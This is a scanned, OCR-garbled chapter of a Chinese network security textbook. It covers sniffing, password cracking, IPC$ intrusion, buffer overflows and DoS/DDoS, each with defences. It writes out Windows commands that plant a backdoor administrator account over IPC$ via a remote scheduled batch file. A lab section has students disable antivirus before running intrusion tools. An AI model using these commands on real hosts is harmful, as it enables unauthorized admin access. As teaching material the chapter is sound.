中 常用 的 一 种 技术 ,在 网 络 中 监听 他 人 的 数据 包 , 分 析 数 据 包 , 从 而 获得 一 些 敏感 信息 ,如 账 
号 和 密码 等 。 网 络 监听 原本 是 网 络 管理 员 经 常 使 用 的 一 个 工具 ,主要 用 来 监视 网 络 的 流量 、 
状态 .数据 等 信息 ,比如 Sniffer Pro 就 是 许多 网 络 管理 员 的 必 备 工具 。 另 外 ,分 析 数 据 包 对 
于 防 黑客 技术 (如 对 扫描 过 程 、 攻 击 过程 有 深入 了 解 ) 也 非常 重要 ,从 而 对 防火 墙 制定 相应 规 
则 来 防范 。 所 以 网 络 监听 工具 和 网 络 扫描 工具 一 样 , 也 是 一 把 *“ 双 刃 剑 ,要 正确 地 对 待 。 

对 于 网 络 监 听 , 可 以 采取 以 下 措施 进行 防范 。 

(1) 加 密 。 一 方面 可 以 对 数据 流 中 的 部 分 重要 信息 进行 加 密 ; 另 一 方面 也 可 只 对 应 用 
层 加 密 ,后 者 将 使 大 部 分 与 网 络 和 操作 系统 有 关 的 敏感 信息 失去 保护 。 选 择 何 种 加 密 方式 
取决 于 信息 的 安全 级 别 及 网 络 的 安全 程度 。 

(2) 划分 VLAN。VLAN( 虚 拟 局 域 网 ) 技 术 可 以 有 效 缩小 冲突 域 , 通 过 划分 VLAN 能 
防范 大 部 分 基于 网 络 监听 的 人 侵 。 


6.3.4 口令 破解 


1. 口令 破解 概述 


为 了 安全 起 见 . 现 在 几乎 所 有 的 系统 都 通过 访问 控制 来 保护 自己 的 数据 。 访 问 控制 最 
常用 的 方法 就 是 口令 (密码 ) 保 护 , 口 令 应 该 说 是 用 户 最 重要 的 一 道 防护 门 。 攻 击 者 攻击 目 
标 是 常常 把 破解 用 户 的 口令 作为 攻击 的 开始 。 只 要 攻击 者 能 猜测 到 或 者 确定 用 户 的 口令 ， 
就 能 获得 机 器 或 网 络 的 访问 权 ,并 能 访问 到 用 户 能 访问 到 的 任何 资源 。 如 果 这 个 用 户 有 管 
理 员 的 权限 ,将 是 极其 危险 的 。 

一 般 攻 击 者 常常 通过 下 面 几 种 方法 获取 用 户 的 密码 口令 :暴力 破解 .Sniffer 密码 嗅 探 、 
社会 工程 学 ( 即 通过 欺诈 手段 获取 ) 以 及 木马 程序 或 键盘 记录 程序 等 。 下 面 主要 讲解 暴力 
破解 。 
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系统 账户 密码 的 暴力 破解 主要 是 基于 密码 匹配 的 破解 方法 ,最 基本 的 方法 有 两 个 : 穷 举 
法 和 字典 法 。 穷 举 法 是 效率 最 低 的 方法 ,将 字符 或 数字 按照 穷 举 的 规则 生成 口令 字符 串 , 进 
行 遍历 尝试 。 在 口令 稍微 复杂 的 情况 下 , 穷 举 法 的 破解 速度 很 慢 。 字 典 法 相对 来 说 破解 速 
度 较 快 ,用 口令 字典 中 事先 定义 好 的 常用 字符 去 尝试 匹配 口令 。 口 令 字典 是 一 个 很 大 的 文 
本 文件 ,可 以 通过 自己 编辑 或 者 由 字典 工具 生成 ,里面 包含 了 单词 或 者 数字 的 组 合 。 如 果 密 
码 是 一 个 单词 或 者 是 简单 的 数字 组 合 ,那么 破解 者 就 可 以 很 轻易 地 破解 密码 。 


SAMInside 等 。 通 过 这 些 工 具 的 使 用 ,可 以 了 解 口令 的 安全 性 。 随 着 网 络 黑客 技术 的 增强 
和 提高 ,许多 口令 都 可 能 被 攻击 和 破译 ,这 就 要 求 用 户 提 高 对 口令 安全 的 认识 。 


2. 口令 破解 示例 


SMBCrack 是 基于 Windows 操作 系统 的 口令 破解 工具 ,使 用 了 SMB 协议 。 因 为 
Windows 可 以 在 同一 个 会 话 内 进行 多 次 口令 试探 ,所 以 用 SMBCrack 可 以 破解 操作 系统 的 
口令 。 

假设 目标 主机 的 用 户 名 为 abc, 密 码 为 123456 .为 了 提高 实验 效果 ,提前 制作 好 字典 文 
件 user. txt 和 pass. txt, 口 令 破解 结果 如 图 6-6 所 示 。 


图 6-6 ”SMBCrack 口令 破解 


针对 暴力 破解 ,Windows 操作 系统 有 很 有 效 的 防护 方法 .只 要 启动 账户 锁定 策略 就 可 
以 了 。 如 果 操 作 系 统 口 令 被 破解 了 ,黑客 就 可 以 利用 一 些 工具 获得 对 方 系统 的 Shell, 那 么 
用 户 的 信息 将 很 容易 被 窃取 。 


3. 口令 破解 的 防范 


对 网 络 用 户 的 用 户 名 和 口令 (密码 ) 进 行 验证 ,是 防止 非法 访问 的 第 一 道 防线 。 用 户 在 
注册 网 络 时 , 需 输 入 用 户 名 和 密码 .服务 器 将 验证 其 合法 性 。 在 用 户 名 与 密码 两 者 之 中 , 密 
码 是 问题 的 关键 所 在 。 据 统计 .大 约 80% 的 安全 隐患 是 由 于 密码 设置 不 当 引 起 的 。 因 此 ， 
密码 的 设置 无 疑 是 十 分 讲求 技巧 的 。 

若 欲 保证 密码 的 安全 .应 当 遵循 以 下 规则 。 

中 用 户 密码 应 包含 英文 字母 的 大 小 写 .数字 和 可 打印 字符 ,甚至 是 非 打 印字 符 , 将 这 些 
符号 排列 组 合 使 用 .以 期 达到 最 好 的 保密 效果 。 
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@ 用 户 密码 不 要 太 规 则 ,不 要 使 用 用 户 姓名 .生日 .电话 号 码 .常用 单词 等 作为 密码 。 

@ 根据 黑客 软件 的 工作 原理 ,参照 密码 破译 的 难 易 程度 ,以 破解 需要 的 时 间 为 排序 指 
标 ,密码 长 度 设置 时 应 遵循 7 位 或 14 位 的 整数 倍 原则 。 

@ 在 通过 网 络 验证 密码 过 程 中 ,不 得 以 明文 方式 传输 ,以 免 被 监听 截获 。 

@@ 密码 不 得 以 明文 方式 存储 在 系统 中 ,确保 密码 以 加 密 的 形式 写 在 硬盘 上 且 包 含 密码 
的 文件 是 只 读 的 。 

@ 密码 应 定期 修改 ,避免 重复 使 用 旧 密 码 ,采用 多 套 密码 的 命名 规则 。 

@ 建立 账号 锁定 机 制 。 一 旦 同一 账号 密码 校 验 错误 若干 次 即 断 开 连 接 并 锁定 该 账号 ， 
经 过 一 段 时 间 以 后 才能 解锁 。 


6.3.5 IPC$ 入 侵 


1. IPC$ 概述 

IPC$ 是 Windows 系统 特有 的 一 项 管理 功能 ,是 Microsoft 公司 为 了 方便 用 户 使 用 计 
算 机 而 设 定 的 ,主要 用 来 远程 管理 计算 机 。 事 实 上 使 用 这 个 功能 最 多 的 人 不 是 网 络 管理 员 ， 
而 是 入 侵 者 。IPC 后 面 的 $ 表 示 它 是 隐藏 的 共享 。 通 过 IPC $ 连接 ,入 侵 者 能 够 实现 控制 
目标 主机 。 

IPC(Internet Process Connection) 是 共享 “命名 管道 "的 资源 , 它 是 为 了 让 进程 间 通 信 
而 开放 的 命名 管道 ,可 以 通过 验证 用 户 名 和 口令 来 获得 相应 的 权限 ,在 建立 连接 时 ,如 果 使 
用 空 的 用 户 名 和 密码 所 建立 起 来 的 连接 , 称 为 空 连接 。 空 连接 相当 于 匿名 访问 ,权限 很 低 ， 
但 可 枚 举 出 目标 主机 的 用 户 名 列表 。 不 过 ,通过 修改 注册 表 可 禁止 枚 举 出 用 户 列表 。 在 获 
得 用 户 列 表 后 ,使 用 密码 字典 ,可 进行 密码 探测 ,或 通过 密码 暴力 破解 ,来 获得 账户 的 密码 。 

2. IPC $ 入 侵 方法 

(1) IPC$ 连接 的 建立 与 断 开 

@ 建立 IPC$ 连接 。 假 设 192.168. 1. 104 主机 的 用 户 名 为 abc, 密 码 为 123456, 则 输入 
以 下 命令 。 

net use \\192.168.1.104\IPC$ "123456" /user: "abc" 

若 要 建立 空 连接 , 则 输入 以 下 命令 。 

net use \\192.168.1.104\IPC$ ""” /user: "" 

@ 建立 网 络 驱动 器 ,输入 以 下 命令 。 

net use z: \\192.168.1.104\C$ 

若 要 删除 网 络 驱动 器 ,输入 以 下 命令 。 

net use z: /delete 

@ 断 开 IPC$ 连 接 。 输 入 以 下 命令 。 
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net use \\192.168. 1.104\IPCS$ /delete 


(2) 建立 后 门 账号 

DO 编写 批 处 理 文 件 。 在 “记事 本 ”中 输入 net user sysback 123456 /add 和 net 
localgroup administrators sysback /add 命令 ,另存 为 hack. bat 文件 。 

@ 与 目标 主机 建立 IPC$ 连接。 

@ 复制 文件 到 目标 主机 。 输 入 copy hack. bat \\192. 168. 1. 104\C $ 命令 ,把 hack. bat 
文件 复制 到 目标 主机 的 C 盘 中 。 

@ 通过 计划 任务 使 远程 主机 执行 hack. bat 文件 ,输入 net time \\192. 168. 1. 104 命 
令 ,查看 目标 系统 时 间 。 

加 假设 目标 系统 的 时 间 为 22:30, 则 可 输入 at \\192. 168. 1. 104 22:35 c:\hack. bat 命 
令 , 计 划 任 务 添 加 完毕 后 ,使 用 net use * /delete 命令 . 断 开 IPC$ 连接。 

@@ 验证 账号 是 否 成 功 建立 。 等 一 段 时 间 后 ,估计 远程 主机 已 经 执行 了 hack. bat 文件 。 
通过 sysback 账号 建立 IPC$ 连接 。 若 连接 成 功 ,说 明 sysback 后 门 账号 已 经 成 功 建立 。 


3. IPC$ 入 侵 的 防范 


IPC$ 在 为 管理 员 提 供 方 便 的 同时 ,也 留 下 了 严重 的 安全 隐患 ,防范 IPC$ 入 侵 的 方法 
有 以 下 4 种 。 

中 删除 默认 共享 。 

G@ 禁止 利用 空 连接 进行 用 户 名 枚 举 攻 击 。 在 注册 表 中 ,把 HKEY _LOCAL_ 
MACHINE\SYSTEM\CurrentControlSet\Control\Lsa 中 的 restrictanonymous 子 键 的 值 
改 为 1。 修改 完毕 后 重新 启动 计算 机 ,这 样 便 禁止 了 利用 空 连接 进行 用 户 名 枚 举 攻击 
(nbtstat -a IP)。 不 过 需要 说 明 的 是 ,这 种 方法 并 不 能 禁止 建立 空 链接 。 

四 关闭 Server 服务 。Server 服务 是 IPC $ 和 默认 共享 所 依赖 的 服务 ,如果 关闭 Server 
服务 ,IPC $ 和 默认 共享 便 不 存在 ,但 同时 服务 器 也 丧失 了 其 他 一 些 服务 ,因此 该 方法 只 适 
合 个 人 计算 机 使 用 。 

@ 屏蔽 139、445 端口 。 没 有 这 两 个 端口 的 支持 ,是 无 法 建立 IPC$ 连 接 的 ,因此 屏蔽 
139、445 端口 同样 可 以 阻止 IPC$ 入 侵 。 


6.3.6 缓冲 区 溢出 攻击 


缓冲 区 溢出 是 一 种 非常 普通 ,非常 危险 的 漏洞 ,在 各 种 操作 系统 .应 用 软件 中 广泛 存在 
着 。 利 用 缓冲 区 溢出 漏洞 ,可 以 执行 非 授 权 指令 ,甚至 可 以 取得 系统 管理 员 权限 ,进行 各 种 
非法 操作 。 


1. 缓冲 区 溢出 原理 


缓冲 区 溢出 攻击 是 指 通过 向 程序 的 缓冲 区 写 人 超出 其 长 度 的 内 容 , 造 成 缓冲 区 的 溢出 ， 

从 而 破坏 程序 的 堆栈 .使 程序 转 而 执行 其 他 指令 .以 达到 攻击 的 目的 。 造 成 缓冲 区 溢出 的 原 
因 是 没有 仔细 检查 程序 中 用 户 输入 的 参数 。 例 如 下 面 的 程序 : 
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#include 一 stdio. h> 
# include 一 string.h> 
char bigbuffer[] = "0123456789"; 
main( ) 
{ 
char smallbuffer[5]; 
strcpy( smallbuffer, bigbuffer); 
} 
上 面 的 strcepyO 〇 将 bigbuffer 中 的 内 容 复制 到 smallbuffer 中 。 因 为 bigbuffer 中 的 字符 
数 (10) 大 于 smallbuffer 能 容纳 的 字符 数 (5) ,造成 smallbuffer 的 溢出 ,使 程序 运行 出 错 。 
通过 制造 缓冲 区 溢出 使 程序 运行 一 个 用 户 shell, 再 通过 shell 执行 其 他 命令 。 如 果 该 
程序 属于 root 且 有 suid 权限 ,攻击 者 就 获得 了 一 个 有 root 权限 的 shell, 可 以 对 系统 进行 任 
意 操 作 。 


2. 缓冲 区 溢出 攻击 的 防范 


缓冲 区 游 出 攻击 的 防范 主要 从 操作 系统 安全 和 程序 设计 两 方面 实施 。 操 作 系 统 安全 是 
最 基本 的 防范 措施 ,方法 也 很 简单 ,就 是 及 时 下 载 和 安装 系统 补丁 。 程 序 设计 方面 的 措施 主 
要 有 以 下 几 个 方面 。 

@ 编写 正确 的 代码 。 编 写 正 确 的 代码 是 一 件 有 意义 但 耗 时 的 工作 ,尽管 人 们 知道 了 如 
何 编写 安全 的 程序 ,具有 安全 漏洞 的 程序 依旧 出 现 ,因此 人 们 开发 了 一 些 工 具 和 技术 来 帮助 
程序 员 编 写 安 全 正确 的 程序 。 

@ 非 执行 的 缓冲 区 。 通 过 使 被 攻击 程序 的 数据 段 地 址 空间 不 可 执行 ,从 而 使 攻击 者 不 
可 能 执行 被 攻击 程序 输入 缓冲 区 的 代码 ,这 种 技术 被 称 为 非 执行 的 缓冲 区 技术 。 

@ 数组 边界 检查 。 数 组 边界 检查 完全 防止 了 缓冲 区 溢出 的 产生 和 攻击 ,但 相对 而 言 代 
价 较 大 。 

@ 程序 指针 失效 前 进行 完整 性 检查 。 即 便 一 个 攻击 者 成 功 地 改变 了 程序 的 指针 ,由 于 
系统 事先 检测 到 了 指针 的 改变 ,因此 这 个 指针 将 不 会 被 使 用 。 虽 然 这 种 方法 不 能 使 所 有 的 
缓冲 区 溢出 失效 .但 能 阻止 绝 大 多 数 的 缓冲 区 溢出 攻击 。 


6.3.7 拒绝 服务 攻击 


1. 拒绝 服务 攻击 的 定义 


拒绝 服务 (Denial of Services,DoS) 攻 击 从 广义 上 讲 可 以 指 任何 导致 网 络 设备 (服务 器 、 
防火 墙 、 交 换 机 、 路 由 器 等 ) 不 能 正常 提供 服务 的 攻击 ,现在 一 般 指 的 是 针对 服务 器 的 DoS 
攻击 。 这 种 攻击 可 能 是 网 线 被 拔 下 或 者 网 络 的 交通 堵塞 等 ,最 终结 果 是 正常 用 户 不 能 使 用 
所 需要 的 服务 。 

从 网 络 攻击 的 各 种 方法 和 所 产生 的 破坏 情况 来 看 .DoS 是 一 种 很 简单 但 又 很 有 效 的 攻 
击 方式 。 尤 其 是 对 于 ISP、 电 信和 部 门 .还 有 DNS 服务 器 、Web 服务 器 防火墙 等 来 说 .DoS 攻 
击 的 影响 都 是 非常 大 的 。 
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2. 拒绝 服务 攻击 的 目的 


Dos 攻击 的 目的 是 拒绝 服务 访问 ,破坏 组 织 的 正常 运行 .最 终 会 使 部 分 Internet 连接 和 
网 络 系统 失效 。 有 些 人 认为 DoS 攻击 是 没有 用 的 ,因为 DoS 攻击 不 会 直接 导致 系统 渗透 。 
但 是 ,黑客 使 用 DoS 攻击 有 以 下 目的 。 

@ 使 服务 器 崩溃 并 让 其 他 人 也 无 法 访问 。 

@ 黑客 为 了 冒充 某 台 服务 器 ,就 对 其 进行 DoS 攻击 ,使 之 瘫痪 。 

@ 黑客 为 了 启动 安装 的 木马 ,要 求 系 统 重新 启动 ,DoS 攻击 可 以 用 于 强制 服务 器 重新 
启动 。 


3. 拒绝 服务 攻击 的 原理 


Dos 攻击 就 是 想 办 法 让 目标 机 器 停止 提供 服务 或 资源 访问 ,这些 资源 包括 磁盘 空间 、 内 
存 、 进 程 甚至 网 络 带宽 ,从 而 阻止 正常 用 户 的 访问 。 

DoS 攻击 的 方式 有 很 多 种 ,根据 其 攻击 的 手法 和 目的 不 同 , 主 要 有 以 下 两 种 不 同 的 存在 
形式 。 

中 资源 耗 尽 攻击 。 指 攻击 者 以 消耗 主机 的 可 用 资源 为 目的 ,使 目标 服务 器 忙于 应 付 大 
量 非 法 的 、 无 用 的 连接 请 求 , 占 用 了 服务 器 所 有 的 资源 ,造成 服务 器 对 正常 的 请 求 无 法 再 做 
出 及 时 响应 ,从 而 形成 事实 上 的 服务 中 断 , 这 也 是 最 常见 的 拒绝 服务 攻击 形式 。 这 种 攻击 主 
要 利用 的 是 网 络 协议 或 者 是 系统 的 一 些 特点 和 漏洞 进行 攻击 ,主要 的 攻击 方法 有 死亡 之 
ping、SYN Flood、UDP Flood ICMP Flood、Land、Teardrop 等 ,针对 这 些 漏 洞 的 攻击 ,目前 
在 网 络 中 都 有 大 量 的 工具 可 以 利用 。 

@ 带宽 耗 尽 中 止 。 指 攻击 者 以 消耗 服务 器 链 路 的 有 效 带宽 为 目的 ,通过 发 送 大 量 的 有 
用 或 无 用 的 数据 包 ,将 整 条 链 路 的 带宽 全 部 占用 ,从 而 使 合法 用 户 请 求 无 法 通过 链 路 到 达 服 
务 器 。 例 如 ,蠕虫 对 网 络 的 影响 。 具 体 的 攻击 方式 有 很 多 ,如 发 送 垃圾 邮件 ,向 匿名 FTP 传 
送 垃圾 文件 ,把 服务 器 的 硬盘 塞 满 ; 合 理 利 用 策略 锁定 账户 ,一般 服务 器 都 有 关于 账户 锁定 
的 安全 策略 , 某 个 账户 连续 3 次 登录 失败 ,那么 这 个 账户 将 被 锁定 。 破 坏 者 伪装 一 个 账户 去 
错误 地 登录 ,使 这 个 账户 被 锁定 ,正常 的 合法 用 户 则 不 能 使 用 这 个 账户 登录 系统 了 。 

以 下 是 几 种 常见 的 拒绝 服务 攻击 。 

(1) 死亡 之 ping 

死亡 之 ping(Ping of Death) 是 最 古老 .最 简单 的 拒绝 服务 攻击 , 它 发 送 大 于 65 535 字 
节 的 ICMP 数据 包 , 如 果 ICMP 数据 包 的 尺寸 超过 64KB 上 限时 ,主机 就 会 出 现 内 存 分 配 错 
误 ,导致 TCP/IP 堆栈 崩 浊 ,致使 主机 死机 。 

此 外 ,向 日 标 主机 长 时 间 、 连 续 、 大 量 地 发 送 ICMP 数据 包 最 终 也 会 使 系统 瘫痪 。 大 量 
的 ICMP 数据 包 会 形成 “TCMP 风暴 ”, 使 日 标 主 机 耗费 大 量 的 CPU 资源 。 

正确 地 配置 操作 系统 和 防火 墙 ` 阻 断 ICMP 以 及 任何 未 知 协议 都 可 以 防范 此 类 攻击 。 

(2) SYN Flood 攻击 

SYN Flood 攻击 利用 的 是 TCP 协议 缺陷 。 通 常 一 次 TCP 连接 的 建立 包括 3 次 握手 过 
程 :客户 端 发 送 SYN 包 给 服务 器 ;@@ 服 务 器 分 配 一 定 的 资源 并 返回 SYN 十 ACK 包 , 并 等 
待 连接 建立 的 最 后 的 ACK 包 ;@ 最 后 客户 端 发 送 ACK 包 。 这 样 两 者 之 间 的 连接 建立 起 
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来 ,并 可 以 通过 连接 传送 数据 。 

SYN Flood 攻击 就 是 疯狂 地 发 送 SYS 包 , 而 不 返回 1Sm 
ACK 包 , 当 服务 器 未 收 到 客户 端的 ACK 包 时 ,规范 标准 时 NACE 
规定 必须 重 发 SYN 十 ACK 包 , 一 直到 超时 才 将 此 条 日 从 A 
未 连接 队列 中 删除 。SYN Flood 攻击 消耗 CPU 和 内 存 资 xt 机 _3_F- 人 sw 、 
源 ,导致 系统 资源 占用 过 多 ,没有 能 力 响 应 其 他 操作 ,或 者 
不 能 响应 正常 的 网 络 请 求 ,如 图 6-7 所 示 。 ed 

由 于 TCP/IP 相信 数据 包 的 源 卫 地 址 ,攻击 者 还 可 以 伪造 源 耳 地 址 ,如 图 6-8 所 示 , 给 追 
查 造成 很 大 的 困难 。SYN Flood 攻击 除了 能 影响 主机 外 ,还 危害 路 由 器 防火 墙 等 网 络 系统 ， 
事实 上 SYN Flood 攻击 并 不 管 日 标 是 什么 系统 ,只 要 这 些 系 统 打 开 TCP 服务 就 可 以 实施 。 


1 SYN 2 SYN+ACK 
一 一 一 一 
3 等 待 ACK 虚假 IP 地 址 
攻击 机 二 


图 6-8 伪造 源 IP 地 址 的 SYN Flood 攻击 


SYN Flood 攻击 实现 起 来 非常 简单 ,网 络 上 有 大 量 现成 的 SYN Flood 攻击 工具 ,如 
xdos、Pdos、SYN-Killer 等 。 以 xdos 为 例 , 选 择 随 机 的 源 IP 地 址 和 源 端 口 ,并 填写 目标 机 器 
IP 地 址 和 TCP 端口 ,运行 后 就 会 发 现 目标 系统 运行 缓慢 ,甚至 死机 。UDP Flood ICMP 
Flood 攻击 的 原理 与 SYN Flood 攻击 类 似 。 

关于 SYN Flood 攻击 的 防范 ,目前 许多 防火 墙 和 路 由 器 都 可 以 做 到 。 首 先 关 闭 不 必要 
的 TCP/IP 服务 ,对 防火 墙 进行 配置 ,过 滤 来 自 同一 主机 的 后 续 连 接 , 然 后 根据 实际 的 情况 
来 判断 。 

(3) Land 攻击 

Land 攻击 是 打造 一 个 特别 的 SYN 包 , 包 的 源 IP 地 址 和 目标 IP 地 址 都 被 设置 成 被 攻 
击 的 服务 器 IP 地 址 ,这 时 将 导致 服务 器 向 自己 的 IP 地 址 发 送 SYN 十 ACK 包 , 结 果 这 个 IP 
地 址 又 发 回 ACK 包 并 创建 一 个 空 连接 ,每 一 个 这 样 的 连接 都 将 保留 直到 超时 。 

不 同 的 系统 对 Land 攻击 的 反应 不 同 ,许多 UNIX 系统 会 崩溃 ,而 Windows 会 变 得 极 
其 缓慢 (大 约 持续 5 分 钟 ) 。 

(4) Teardrop 攻击 

Teardrop( 泪 珠 ) 攻 击 的 原理 是 ,IP 数据 包 在 网 络 中 传递 时 ,数据 包 可 以 分 成 更 小 的 片 
段 ,攻击 者 可 以 通过 发 送 两 段 ( 或 者 更 多 ) 数 据 包 来 实现 。 第 一 个 包 的 偏 移 量 为 0. 长 度 为 
NN, 第 二 个 包 的 偏 移 量 小 于 N。 为 了 合并 这 些 数据 段 .TCP/IP 堆栈 会 分 配 超 乎 寻常 的 巨大 
资源 ,从 而 造成 系统 资源 的 缺乏 甚至 机 器 的 重新 启动 。 

关于 Land 攻击 、Teardrop 攻击 的 防范 .给 系统 打上 最 新 的 补丁 即 可 。 


4. 分 布 式 拒绝 服务 攻击 的 原理 


分 布 式 拒绝 服务 (Distributed Denial of Services,DDoS) 攻 击 是 一 种 基于 DoS 的 特殊 形 
172 


项 目 6 网 络 攻击 与 防范 


司 .搜索 引擎 或 政府 部 门 的 站 点 。 与 早期 的 DoS 相 比 ,DDoS 借助 数 百 台 、 数 千 台 甚至 数 万 
台 受 控制 的 机 器 向 同一 台 机 器 同时 发 起 攻击 ,如 图 6-9 所 示 , 这 种 来 势 凶 猛 的 攻击 令 人 难以 
防备 ,具有 很 大 的 破坏 力 。 


本 


a ~ Es 

有 目标 主机 

A 一 轩 8 
国 一 人 


代理 端 
图 6-9 分 布 式 拒绝 服务 攻击 


国民 代理 端 


DDoS 攻击 分 为 3 层 :攻击 者 . 主 控 端 和 代理 端 , 三 者 在 攻击 中 扮演 着 不 同 的 角色 。 

(1) 攻击 者 。 攻 击 者 所 用 的 计算 机 是 攻击 主 控 台 ,可 以 是 网 络 上 的 任何 一 台 主 机 。 攻 
击 者 操纵 整个 攻击 过 程 , 它 向 主 控 端 发 送 攻击 命令 。 

(2) 主 控 端 。 主 控 端 是 攻击 者 非法 侵入 并 控制 的 一 批 主机 ,这 些 主机 还 分 别 控制 着 大 
量 的 代理 主机 。 在 主 控 端 主机 上 安装 了 特定 的 程序 ,因此 它们 可 以 接收 攻击 者 发 来 的 特殊 
指令 ,并 且 可 以 把 这 些 命令 发 送 到 代理 主机 上 。 

(3) 代理 端 。 代 理 端 同样 也 是 攻击 者 侵入 并 控制 的 一 批 主机 ,它们 上 面 运行 攻击 器 程 

序 ,接收 和 运行 主 控 端 发 来 的 命令 。 代 理 端 主机 是 攻击 的 执行 者 ,真正 向 受害 者 主机 发 动 
二 

攻击 者 发 起 DDoS 攻击 的 第 一 步 , 就 是 寻找 在 Internet 上 有 漏洞 的 主机 ,进入 系统 后 在 
其 上 面 安装 后 门 程序 ,攻击 者 入 侵 的 主机 越 多 ,他 的 攻击 队伍 就 越 壮 大 。 第 二 步 是 在 被 人 侵 
主机 上 安装 攻击 程序 ,其 中 一 部 分 主机 充当 攻击 的 主 控 端 , 另 一 部 分 主机 充当 攻击 的 代理 
端 ,最 后 各 部 分 主机 各 司 其 职 , 在 攻击 者 的 调遣 下 对 攻击 对 象 发 起 攻击 。 由 于 攻击 者 在 幕后 
操纵 ,所 以 在 攻击 时 不 会 受到 监控 系统 的 跟踪 .身份 不 容易 被 发 现 。 

DDoS 攻击 实施 起 来 有 一 定 的 难度 . 它 要 求 攻击 者 必须 具备 入 侵 他 人 计算 机 的 能 力 。 
但 是 很 遗憾 的 是 一 些 傻瓜 式 的 黑客 程序 的 出 现 ,这 些 程 序 可 以 在 几 秒 钟 内 完成 人 侵 和 攻击 
程序 的 安装 ,使 发 动 DDoS 攻击 变 成 一 件 轻而易举 的 事情 。 


5. 分 布 式 拒绝 服务 攻击 的 防范 


到 目前 为 止 ,对 DDoS 的 防御 还 是 比较 困难 的 。 首 先 ,这 种 攻击 是 利用 了 TCP/IP 协议 
的 漏洞 ,要 完全 抵御 DDoS 攻击 从 原理 上 讲 不 太 现实 。 就 好 像 有 1 000 个 人 同时 给 你 家 里 
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打 电 话 , 这 时 候 你 的 朋友 还 打 的 进来 吗 ? 虽然 人 们 不 能 完全 杜绝 DDoS 攻击 ,但 还 是 可 以 尽 
量 避 免 它 给 系统 带 来 更 大 的 危害 。 

(1) 在 服务 上 关闭 不 必要 的 服务 ,限制 同时 打开 的 SYN 半 连 接 数 目 , 缩 短 SYN 半 连 接 
的 超时 时 间 ,及 时 更 新 系统 补丁 。 

(2) 在 防火 墙 方面 ,禁止 对 主机 的 非 开 放 服 务 的 访问 ,限制 同时 打开 的 SYN 最 大 连接 
数 ,启用 防火 墙 的 防 DDoS 攻击 的 功能 ,严格 限制 对 外 开放 的 服务 器 的 向 外 访问 以 防止 自己 
的 服务 器 被 当做 倪 价 机 。 

(3) 在 路 由 器 方面 ,使 用 访问 控制 列表 (ACL) 过 滤 , 设 置 SYN 数据 包 流 量 速率 ,升级 版 
本 过 低 的 操作 系统 ,为 路 由 器 做 好 日 志 记录 。 

(4) ISP/ICP 要 注意 自己 管理 范围 内 的 客户 托管 主机 不 要 成 为 侧 儒 机 ,因为 有 些 托 管 
主机 的 安全 性 较 差 ,应 该 和 客户 搞 好 关系 ,努力 解决 可 能 存在 的 问题 。 

(5) 骨干 网 络 运营 商 在 自己 的 出 口 路 由 器 上 进行 源 IP 地 址 的 验证 ,如 果 在 自己 的 路 由 
表 中 没有 用 到 这 个 数据 包 源 IP 的 路 由 ,就 丢掉 这 个 包 。 这 种 方法 可 以 阻止 黑客 利用 伪造 的 
源 IP 地 址 来 进行 分 布 式 拒 绝 服务 攻击 。 当 然 这 样 做 可 能 会 降低 路 由 器 的 效率 ,这 也 是 骨干 
网 络 运营 商 非常 关注 的 问题 ,所 以 这 种 做 法 真正 实施 起 来 还 很 困难 。 

对 分 布 式 拒绝 服务 的 原理 与 应 付 方法 的 研究 一 直 在 进行 中 ,找到 一 个 既 有 效 又 切实 可 
行 的 方案 不 是 一 朝 一 夕 的 事情 。 但 目前 至 少 可 以 做 到 把 自己 的 网 络 与 主机 维护 好 ,首先 ,让 
自己 的 主机 不 成 为 被 人 利用 的 对 象 去 攻击 别人 ;其 次 ,在 受到 攻击 的 时 候 ,要 尽量 保存 证 据 ， 
以 便 事后 追查 ,一 个 良好 的 网 络 和 系统 日 志 是 必要 的 。 


64 项 目 实 施 


6.4.1 任务 1: 黑客 入 侵 的 模拟 演示 


1. 任务 目标 


(1) 掌握 常用 黑客 人 侵 的 工具 及 其 使 用 方法 。 
(2) 了 解 黑客 人 侵 的 基本 过 程 。 
(3) 了 解 黑客 人 侵 的 危害 性 。 


2. 任务 内 容 


(1) 模拟 攻击 前 的 准备 工作 。 

(2) 利用 X-Scan 扫描 器 得 到 远程 主机 B 的 弱 口 令 。 
(3) 利用 Recton 工具 远程 入 侵 主 机 B。 

(4) 利用 DameWare 软件 远程 监控 主机 B。 


3. 完成 任务 所 需 的 设备 和 软件 


(1) 装 有 Windows XP 操作 系统 的 PC 1 台 . 作 为 主机 A( 攻 击 机 )。 
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(2) 装 有 Windows Server 2003 操作 系统 的 PC 1 台 , 作 为 主机 B( 被 攻击 机 )。 
(3) X-Scan、Recton、DameWare 工具 软件 各 1 套 。 


4. 任务 实施 步骤 


(1) 模拟 攻击 前 的 准备 工作 

步骤 1: 由 于 本 次 模拟 攻击 所 用 到 的 工具 软件 均 可 被 较 新 的 杀毒 软件 和 防火 墙 检测 出 
来 并 自动 进行 隔离 或 删除 ,因此 ,在 模拟 攻击 前 要 先 将 两 台 主 机 安装 的 杀毒 软件 和 
Windows 防火 墙 等 全 部 关闭 。 

步骤 2: 在 默认 的 情况 下 ,两 台 主 机 的 IPFC $ 共享 .默认 共享 、135 端口 和 WMI 
(Windows Management Instrumentation ,Windows 管理 规范 ) 服 务 均 处 于 开启 状态 ,在 主 
机 B 上 禁用 Terminal Services 服务 ( 主要 用 于 远程 桌面 连接 ?后 重新 启动 计算 机 。 

步骤 3: 设置 主机 A( 攻 击 机 ) 的 IP 地 址 为 2 
192. 168. 1. 101, 主 机 B( 被 攻击 机 ) 的 IP 地 址 为 
192. 168. 1. 102(IP 地 址 可 以 根据 实际 情况 自行 设 
定 ) ,两 台 主 机 的 子 网 掩 码 均 为 255. 255. 255. 0。 设 
置 完 成 后 用 ping 命令 测试 两 台 主 机 连接 成 功 。 

步骤 4: 为 主机 B 添加 管理 员 用 户 abc., 密 码 为 
123。 

步骤 5: 打开 主机 B 的 “控制 面板 ”中 的 “管理 
工具 ”, 执 行 “ 本 地 安全 策略 ”命令 ,在 “本 地 策略 ”的 
“安全 选项 "中 找到 “网 络 访问 :本 地 账户 的 共享 和 
安全 模式 ”策略 ,并 将 其 修改 为 “经 典 一 本 地 用 户 以 
自己 的 身份 验证 ”, 如 图 6-10 所 示 。 

(2) 利用 X-Scan 扫描 器 得 到 远程 主机 也 的 弱 
日 令 

步骤 1: 在 主机 A 上 安装 X-Scan 扫描 器 。 在 用 户 名 字典 文件 nt_user. dic 中 添加 由 a、 
bc 三 个 字母 随机 组 合 的 用 户 名 .如 abc cab .bca 等 .每 个 用 户 名 占 一 行 , 中 间 不 要 有 空 行 

